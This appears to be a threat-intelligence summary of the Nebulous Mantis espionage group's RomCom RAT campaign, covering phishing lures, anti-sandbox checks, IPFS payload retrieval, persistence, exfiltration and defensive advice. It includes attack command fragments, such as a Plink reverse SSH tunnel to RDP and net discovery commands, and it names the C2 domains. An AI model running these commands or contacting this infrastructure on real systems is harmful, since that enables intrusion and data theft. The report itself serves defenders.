Threat Title: Nebulous Mantis Deploys RomCom RAT in Geopolitically Motivated Attacks**
Date published: 2025/04/30
Source: https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis/overview#heading-1000
Nebulous Mantis (aka Cuba, STORM-0978), a Russian-speaking cyber espionage group, has actively targeted NATO-aligned governments, defense organizations, and critical infrastructure since 2019 using the RomCom RAT and Hancitor loader. The group delivers malware via spear-phishing emails with weaponized documents, often impersonating legitimate services like OneDrive. Since mid-2022, they shifted exclusively to RomCom, which employs Living off the Land (LOTL) tactics, encrypted C2 communications, and bulletproof hosting (e.g., LuxHost, AEZA) to evade detection. The malware uses multi-stage execution, including a downloader variant that fetches additional payloads via IPFS (e.g., ipfs.io, hardbin.com), and deploys tools like Plink, WinRAR, and AD Explorer for lateral movement. RomCom’s C2 panel ("Vanished ver. 1.1.3") enables granular victim management, including data exfiltration, ransomware deployment, and custom command execution. The group’s double extortion strategy combines data theft with ransomware (e.g., Cuba, Industrial Spy, Team Underground), impacting over 46 critical victims monthly. Key operator LARVA-290 maintains infrastructure, suggesting organizational maturity. Nebulous Mantis demonstrates advanced tradecraft, including COM hijacking for persistence, time-zone awareness to align attacks with business hours, and SSH tunneling (Plink) for stealthy RDP access.
Initial Access
→ Spear-phish email (OneDrive-themed link)
→ "Situation_Details_April_25.pdf" lure
→ Redirects to Mediafire
→ Downloads Side Effects Documentation feb25.exe (Downloader)
Execution
→ Downloader checks:
RecentDocs registry key > 55 (anti-sandbox)drivedefend[.]comKeyprov.dll (injected into explorer.exe)Persistence & C2
→ RomCom Stage 1 calls opendnsapi.net
→ Retrieves tools via IPFS (ipfs.io, hardbin.com):
- Plink (SSH tunneling)
- WinRAR (data staging)
- AD Explorer (lateral movement)
→ Drops binaries in C:\Users\Public\:
- mfc86.exe, shbhost.exe (renamed payloads)
Lateral Movement
→ COM hijacking (registry CLSID)
→ SSH tunnels: Plink -R 25671:[internal_IP]:3389
→ Net commands: net view /all \\TARGET
Exfiltration
→ Collects data to C:\Users\Public\Music\
→ Compresses with WinRAR (1.rar)
→ Exfil via C2 (opendnsapi.net)
RomCom enables persistent access, credential theft, and network compromise, with ransomware deployment disrupting operations. The group’s focus on NATO entities and critical infrastructure poses risks to national security and economic stability.
-> Deploys ransomware (Team Underground)
-> Encrypts files + posts to Data Leak Site (DLS)
To defend against threats like Nebulous Mantis, monitor for LOTL activity by tracking unusual process chains, renamed system tools in public/temp folders, and unexpected IPFS/WebDAV connections. Block bulletproof hosting providers and SSH tunneling (-R flag). Train staff to spot fake cloud storage lures. Maintain offline backups and restrict execution from public directories. Prioritize logging for discovery commands (net view, whoami /all) and timezone checks (tzutil).
Additionally, deploy EDR solutions to detect RomCom’s anti-sandbox checks (e.g., RecentDocs registry queries) and analyze XOR-encrypted C2 traffic. Isolate systems exhibiting AD Explorer or WinRAR execution in Public folders.